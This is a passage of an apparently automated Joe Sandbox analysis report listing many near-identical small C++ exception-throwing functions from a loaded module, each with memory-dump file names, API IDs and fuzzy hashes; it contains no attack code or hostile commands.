                                                                                                          • std::exception::exception.LIBCMT ref: 6F034E28
                                                                                                            • Part of subcall function 6F089533: std::exception::_Copy_str.LIBCMT ref: 6F08954E
                                                                                                          • __CxxThrowException@8.LIBCMT ref: 6F034E3D
                                                                                                            • Part of subcall function 6F08AC75: RaiseException.KERNEL32(?,?,6F089C34,F6D10407,?,?,?,?,6F089C34,F6D10407,6F0B9C90,6F0CB974,F6D10407), ref: 6F08ACB7
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.985301537.000000006F021000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6F020000, based on PE: true
                                                                                                          • Associated: 0000000A.00000002.985296045.000000006F020000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985379199.000000006F0A4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985396418.000000006F0BE000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985404940.000000006F0C0000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985412311.000000006F0C1000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985419999.000000006F0C3000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985437200.000000006F0CA000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985437200.000000006F0CC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985449567.000000006F0CE000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_6f020000_46A3.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Copy_strExceptionException@8RaiseThrow_mallocstd::exception::_std::exception::exception
                                                                                                          • String ID: 0Bo
                                                                                                          • API String ID: 2299493649-2241063504
                                                                                                          • Opcode ID: 0cc3b977095a1b3f71bf63da6e4cbb6168e7414467223e63f95b11fbbc52b507
                                                                                                          • Instruction ID: c2c23f816737e4e2bbebe22ecf9e6bef986e5917f1b1ea6e6478b3e764bfae7b
                                                                                                          • Opcode Fuzzy Hash: 0cc3b977095a1b3f71bf63da6e4cbb6168e7414467223e63f95b11fbbc52b507
                                                                                                          • Instruction Fuzzy Hash: 2AF0A7768042097ADB05DF98D841BCB7BF8AF15344F40C1A9E9599B281EB71E60887E1
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 6F03AE50 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 30COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                            • Part of subcall function 6F089BB5: _malloc.LIBCMT ref: 6F089BCF
                                                                                                          • std::exception::exception.LIBCMT ref: 6F03AE78
                                                                                                            • Part of subcall function 6F089533: std::exception::_Copy_str.LIBCMT ref: 6F08954E
                                                                                                          • __CxxThrowException@8.LIBCMT ref: 6F03AE8D
                                                                                                            • Part of subcall function 6F08AC75: RaiseException.KERNEL32(?,?,6F089C34,F6D10407,?,?,?,?,6F089C34,F6D10407,6F0B9C90,6F0CB974,F6D10407), ref: 6F08ACB7
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.985301537.000000006F021000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6F020000, based on PE: true
                                                                                                          • Associated: 0000000A.00000002.985296045.000000006F020000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985379199.000000006F0A4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985396418.000000006F0BE000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985404940.000000006F0C0000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985412311.000000006F0C1000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985419999.000000006F0C3000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985437200.000000006F0CA000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985437200.000000006F0CC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985449567.000000006F0CE000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_6f020000_46A3.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Copy_strExceptionException@8RaiseThrow_mallocstd::exception::_std::exception::exception
                                                                                                          • String ID: 0Bo
                                                                                                          • API String ID: 2299493649-2241063504
                                                                                                          • Opcode ID: 3c5292f1501f655132845c789c79898ef3fe6e3dc05285db187b9613c184f42e
                                                                                                          • Instruction ID: bdc676b7ae73fda2a7f1decbc735ee708b34f7ad5602511cfc3a8cdca59af271
                                                                                                          • Opcode Fuzzy Hash: 3c5292f1501f655132845c789c79898ef3fe6e3dc05285db187b9613c184f42e
                                                                                                          • Instruction Fuzzy Hash: A1F08276C043086BDB04EF98D801BCB77F8AF55340F40C16AE8199B244EB71EA048BE1
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 6F034E80 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 30COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                            • Part of subcall function 6F089BB5: _malloc.LIBCMT ref: 6F089BCF
                                                                                                          • std::exception::exception.LIBCMT ref: 6F034EA8
                                                                                                            • Part of subcall function 6F089533: std::exception::_Copy_str.LIBCMT ref: 6F08954E
                                                                                                          • __CxxThrowException@8.LIBCMT ref: 6F034EBD
                                                                                                            • Part of subcall function 6F08AC75: RaiseException.KERNEL32(?,?,6F089C34,F6D10407,?,?,?,?,6F089C34,F6D10407,6F0B9C90,6F0CB974,F6D10407), ref: 6F08ACB7
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.985301537.000000006F021000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6F020000, based on PE: true
                                                                                                          • Associated: 0000000A.00000002.985296045.000000006F020000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985379199.000000006F0A4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985396418.000000006F0BE000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985404940.000000006F0C0000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985412311.000000006F0C1000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985419999.000000006F0C3000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985437200.000000006F0CA000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985437200.000000006F0CC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985449567.000000006F0CE000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_6f020000_46A3.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Copy_strExceptionException@8RaiseThrow_mallocstd::exception::_std::exception::exception
                                                                                                          • String ID: 0Bo
                                                                                                          • API String ID: 2299493649-2241063504
                                                                                                          • Opcode ID: 0e67427d6e39871b3b5add311184541edaad506526bb300faa19c1229c5c09ac
                                                                                                          • Instruction ID: 652aadfb55a4d62d7a95d57c0f7e15d7eca5ea9be0357d3d86ab0e1833e30393
                                                                                                          • Opcode Fuzzy Hash: 0e67427d6e39871b3b5add311184541edaad506526bb300faa19c1229c5c09ac
                                                                                                          • Instruction Fuzzy Hash: 58F0A776D042087BDB04DF98D841BCB7BF8AF55340F40C26AE9199B254EB71EA048BE1
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 6F034D70 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 30COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                            • Part of subcall function 6F089BB5: _malloc.LIBCMT ref: 6F089BCF
                                                                                                          • std::exception::exception.LIBCMT ref: 6F034D98
                                                                                                            • Part of subcall function 6F089533: std::exception::_Copy_str.LIBCMT ref: 6F08954E
                                                                                                          • __CxxThrowException@8.LIBCMT ref: 6F034DAD
                                                                                                            • Part of subcall function 6F08AC75: RaiseException.KERNEL32(?,?,6F089C34,F6D10407,?,?,?,?,6F089C34,F6D10407,6F0B9C90,6F0CB974,F6D10407), ref: 6F08ACB7
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.985301537.000000006F021000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6F020000, based on PE: true
                                                                                                          • Associated: 0000000A.00000002.985296045.000000006F020000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985379199.000000006F0A4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985396418.000000006F0BE000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985404940.000000006F0C0000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985412311.000000006F0C1000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985419999.000000006F0C3000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985437200.000000006F0CA000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985437200.000000006F0CC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985449567.000000006F0CE000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_6f020000_46A3.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Copy_strExceptionException@8RaiseThrow_mallocstd::exception::_std::exception::exception
                                                                                                          • String ID: 0Bo
                                                                                                          • API String ID: 2299493649-2241063504
                                                                                                          • Opcode ID: da065f76439c3a2b489afe0088ab682c362010615609e508e062c31942085e33
                                                                                                          • Instruction ID: 502244cefe5a621f84bcc47a7ed9262f9243c1c9f0a6c736968b7434a85e9001
                                                                                                          • Opcode Fuzzy Hash: da065f76439c3a2b489afe0088ab682c362010615609e508e062c31942085e33
                                                                                                          • Instruction Fuzzy Hash: 8EF082769142097BDB04DF98D801BCA7BF8AF55340F40C16AE9199B244EB31A6048BE1
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 6F03ADE0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 30COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                            • Part of subcall function 6F089BB5: _malloc.LIBCMT ref: 6F089BCF
                                                                                                          • std::exception::exception.LIBCMT ref: 6F03AE08
                                                                                                            • Part of subcall function 6F089533: std::exception::_Copy_str.LIBCMT ref: 6F08954E
                                                                                                          • __CxxThrowException@8.LIBCMT ref: 6F03AE1D
                                                                                                            • Part of subcall function 6F08AC75: RaiseException.KERNEL32(?,?,6F089C34,F6D10407,?,?,?,?,6F089C34,F6D10407,6F0B9C90,6F0CB974,F6D10407), ref: 6F08ACB7
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.985301537.000000006F021000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6F020000, based on PE: true
                                                                                                          • Associated: 0000000A.00000002.985296045.000000006F020000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985379199.000000006F0A4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985396418.000000006F0BE000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985404940.000000006F0C0000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985412311.000000006F0C1000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985419999.000000006F0C3000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985437200.000000006F0CA000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985437200.000000006F0CC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985449567.000000006F0CE000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_6f020000_46A3.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Copy_strExceptionException@8RaiseThrow_mallocstd::exception::_std::exception::exception
                                                                                                          • String ID: 0Bo
                                                                                                          • API String ID: 2299493649-2241063504
                                                                                                          • Opcode ID: 497dd5dcdf1fd0371edce15cab102d7922ede967de5e7faabcb75a2d00642c91
                                                                                                          • Instruction ID: 7743720df84ffdcf4f15f58e82a04568c75acc726e0204dd564d6ce8db6db08a
                                                                                                          • Opcode Fuzzy Hash: 497dd5dcdf1fd0371edce15cab102d7922ede967de5e7faabcb75a2d00642c91
                                                                                                          • Instruction Fuzzy Hash: DDF082768042086FDB14EF98E801BCA77FCAF55340F40C16AE8199B254EB71AA048BA1
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 6F036B10 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 30COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                            • Part of subcall function 6F089BB5: _malloc.LIBCMT ref: 6F089BCF
                                                                                                          • std::exception::exception.LIBCMT ref: 6F036B38
                                                                                                            • Part of subcall function 6F089533: std::exception::_Copy_str.LIBCMT ref: 6F08954E
                                                                                                          • __CxxThrowException@8.LIBCMT ref: 6F036B4D
                                                                                                            • Part of subcall function 6F08AC75: RaiseException.KERNEL32(?,?,6F089C34,F6D10407,?,?,?,?,6F089C34,F6D10407,6F0B9C90,6F0CB974,F6D10407), ref: 6F08ACB7
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.985301537.000000006F021000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6F020000, based on PE: true
                                                                                                          • Associated: 0000000A.00000002.985296045.000000006F020000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985379199.000000006F0A4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985396418.000000006F0BE000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985404940.000000006F0C0000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985412311.000000006F0C1000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985419999.000000006F0C3000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985437200.000000006F0CA000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985437200.000000006F0CC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985449567.000000006F0CE000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_6f020000_46A3.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Copy_strExceptionException@8RaiseThrow_mallocstd::exception::_std::exception::exception
                                                                                                          • String ID: 0Bo
                                                                                                          • API String ID: 2299493649-2241063504
                                                                                                          • Opcode ID: 1154b04b7e8565fcde68cfd7d5bbcb6e7e0200d7427198b58ea892095b991f93
                                                                                                          • Instruction ID: 014c33a150ee835c801dbf1a93ab02d4464179193a308f4333f1e051c37a0d52
                                                                                                          • Opcode Fuzzy Hash: 1154b04b7e8565fcde68cfd7d5bbcb6e7e0200d7427198b58ea892095b991f93
                                                                                                          • Instruction Fuzzy Hash: 95F08276914208ABDB04DF98D941FCA77F8AF56340F40C16AE9599B244EB31E6048FA5
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 6F04E980 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 30COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                            • Part of subcall function 6F089BB5: _malloc.LIBCMT ref: 6F089BCF
                                                                                                          • std::exception::exception.LIBCMT ref: 6F04E9A8
                                                                                                            • Part of subcall function 6F089533: std::exception::_Copy_str.LIBCMT ref: 6F08954E
                                                                                                          • __CxxThrowException@8.LIBCMT ref: 6F04E9BD
                                                                                                            • Part of subcall function 6F08AC75: RaiseException.KERNEL32(?,?,6F089C34,F6D10407,?,?,?,?,6F089C34,F6D10407,6F0B9C90,6F0CB974,F6D10407), ref: 6F08ACB7
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.985301537.000000006F021000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6F020000, based on PE: true
                                                                                                          • Associated: 0000000A.00000002.985296045.000000006F020000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985379199.000000006F0A4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985396418.000000006F0BE000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985404940.000000006F0C0000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985412311.000000006F0C1000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985419999.000000006F0C3000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985437200.000000006F0CA000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985437200.000000006F0CC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985449567.000000006F0CE000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_6f020000_46A3.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Copy_strExceptionException@8RaiseThrow_mallocstd::exception::_std::exception::exception
                                                                                                          • String ID: 0Bo
                                                                                                          • API String ID: 2299493649-2241063504
                                                                                                          • Opcode ID: d1f3aebadabba1fae8c98a502c1a6487da3d37bd99f979954a15347a0483c518
                                                                                                          • Instruction ID: 1e738bede58b3b3abbd0c433e6b84642af83d22e334b39933dc574bf7612f8e0
                                                                                                          • Opcode Fuzzy Hash: d1f3aebadabba1fae8c98a502c1a6487da3d37bd99f979954a15347a0483c518
                                                                                                          • Instruction Fuzzy Hash: 6CF0A776914208AADB04EF98D841BCA7BF85F15344F40C1A9EC599B291EB71AA0487A1
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 6F04E850 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 30COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                            • Part of subcall function 6F089BB5: _malloc.LIBCMT ref: 6F089BCF
                                                                                                          • std::exception::exception.LIBCMT ref: 6F04E878
                                                                                                            • Part of subcall function 6F089533: std::exception::_Copy_str.LIBCMT ref: 6F08954E
                                                                                                          • __CxxThrowException@8.LIBCMT ref: 6F04E88D
                                                                                                            • Part of subcall function 6F08AC75: RaiseException.KERNEL32(?,?,6F089C34,F6D10407,?,?,?,?,6F089C34,F6D10407,6F0B9C90,6F0CB974,F6D10407), ref: 6F08ACB7
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.985301537.000000006F021000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6F020000, based on PE: true
                                                                                                          • Associated: 0000000A.00000002.985296045.000000006F020000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985379199.000000006F0A4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985396418.000000006F0BE000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985404940.000000006F0C0000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985412311.000000006F0C1000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985419999.000000006F0C3000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985437200.000000006F0CA000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985437200.000000006F0CC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985449567.000000006F0CE000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_6f020000_46A3.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Copy_strExceptionException@8RaiseThrow_mallocstd::exception::_std::exception::exception
                                                                                                          • String ID: 0Bo
                                                                                                          • API String ID: 2299493649-2241063504
                                                                                                          • Opcode ID: 8f8719f414f4c76576110a07279733ebb6b3569f25b31820670f5e6986218f8d
                                                                                                          • Instruction ID: feab71aee11caaffc73eb7c40804ea5fd0196e6c2c1fbc176ad4e7e644e154a7
                                                                                                          • Opcode Fuzzy Hash: 8f8719f414f4c76576110a07279733ebb6b3569f25b31820670f5e6986218f8d
                                                                                                          • Instruction Fuzzy Hash: 21F0A7B6C14308AADB04DF98E841BDA7FF85F15344F40C1BDEC599B291EB71A60487A1
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 6F04E8D0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 30COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                            • Part of subcall function 6F089BB5: _malloc.LIBCMT ref: 6F089BCF
                                                                                                          • std::exception::exception.LIBCMT ref: 6F04E8F8
                                                                                                            • Part of subcall function 6F089533: std::exception::_Copy_str.LIBCMT ref: 6F08954E
                                                                                                          • __CxxThrowException@8.LIBCMT ref: 6F04E90D
                                                                                                            • Part of subcall function 6F08AC75: RaiseException.KERNEL32(?,?,6F089C34,F6D10407,?,?,?,?,6F089C34,F6D10407,6F0B9C90,6F0CB974,F6D10407), ref: 6F08ACB7
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.985301537.000000006F021000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6F020000, based on PE: true
                                                                                                          • Associated: 0000000A.00000002.985296045.000000006F020000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985379199.000000006F0A4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985396418.000000006F0BE000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985404940.000000006F0C0000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985412311.000000006F0C1000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985419999.000000006F0C3000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985437200.000000006F0CA000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985437200.000000006F0CC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985449567.000000006F0CE000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_6f020000_46A3.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Copy_strExceptionException@8RaiseThrow_mallocstd::exception::_std::exception::exception
                                                                                                          • String ID: 0Bo
                                                                                                          • API String ID: 2299493649-2241063504
                                                                                                          • Opcode ID: e5dfcdfb62dc798012d5dbe72e2836b15f23233d45bdcc0eaefd9dd20427a73b
                                                                                                          • Instruction ID: eb369fad30bb0844707e5f8b3f52f0a02d964d38e4e58721eca22c88c6325dcd
                                                                                                          • Opcode Fuzzy Hash: e5dfcdfb62dc798012d5dbe72e2836b15f23233d45bdcc0eaefd9dd20427a73b
                                                                                                          • Instruction Fuzzy Hash: FFF0A776804209AADB05EF98D941BCA7BF85F15344F40C1A9EC599B291EB71AA04C7A1
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 6F0348F0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 30COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                            • Part of subcall function 6F089BB5: _malloc.LIBCMT ref: 6F089BCF
                                                                                                          • std::exception::exception.LIBCMT ref: 6F034918
                                                                                                            • Part of subcall function 6F089533: std::exception::_Copy_str.LIBCMT ref: 6F08954E
                                                                                                          • __CxxThrowException@8.LIBCMT ref: 6F03492D
                                                                                                            • Part of subcall function 6F08AC75: RaiseException.KERNEL32(?,?,6F089C34,F6D10407,?,?,?,?,6F089C34,F6D10407,6F0B9C90,6F0CB974,F6D10407), ref: 6F08ACB7
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.985301537.000000006F021000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6F020000, based on PE: true
                                                                                                          • Associated: 0000000A.00000002.985296045.000000006F020000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985379199.000000006F0A4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985396418.000000006F0BE000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985404940.000000006F0C0000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985412311.000000006F0C1000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985419999.000000006F0C3000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985437200.000000006F0CA000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985437200.000000006F0CC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985449567.000000006F0CE000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_6f020000_46A3.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Copy_strExceptionException@8RaiseThrow_mallocstd::exception::_std::exception::exception
                                                                                                          • String ID: 0Bo
                                                                                                          • API String ID: 2299493649-2241063504
                                                                                                          • Opcode ID: 6ad1aafe4a6bcd0d7baa98f65dfde69f28c181a3eecd46220e7e929b2fd6f6bd
                                                                                                          • Instruction ID: c74a1848f63b2c5da115b726aebd2fbec9a8538bfe2129a6f12174a4026d1d0a
                                                                                                          • Opcode Fuzzy Hash: 6ad1aafe4a6bcd0d7baa98f65dfde69f28c181a3eecd46220e7e929b2fd6f6bd
                                                                                                          • Instruction Fuzzy Hash: 46F0827A8042087BDB04DF98D841BCA7BF8AF55340F40C16AED199F244EB31E6048BE1
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 6F036740 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 30COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                            • Part of subcall function 6F089BB5: _malloc.LIBCMT ref: 6F089BCF
                                                                                                          • std::exception::exception.LIBCMT ref: 6F036768
                                                                                                            • Part of subcall function 6F089533: std::exception::_Copy_str.LIBCMT ref: 6F08954E
                                                                                                          • __CxxThrowException@8.LIBCMT ref: 6F03677D
                                                                                                            • Part of subcall function 6F08AC75: RaiseException.KERNEL32(?,?,6F089C34,F6D10407,?,?,?,?,6F089C34,F6D10407,6F0B9C90,6F0CB974,F6D10407), ref: 6F08ACB7
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.985301537.000000006F021000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6F020000, based on PE: true
                                                                                                          • Associated: 0000000A.00000002.985296045.000000006F020000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985379199.000000006F0A4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985396418.000000006F0BE000.00000004.00000001.01000000.0000000B.sdmpDownload File
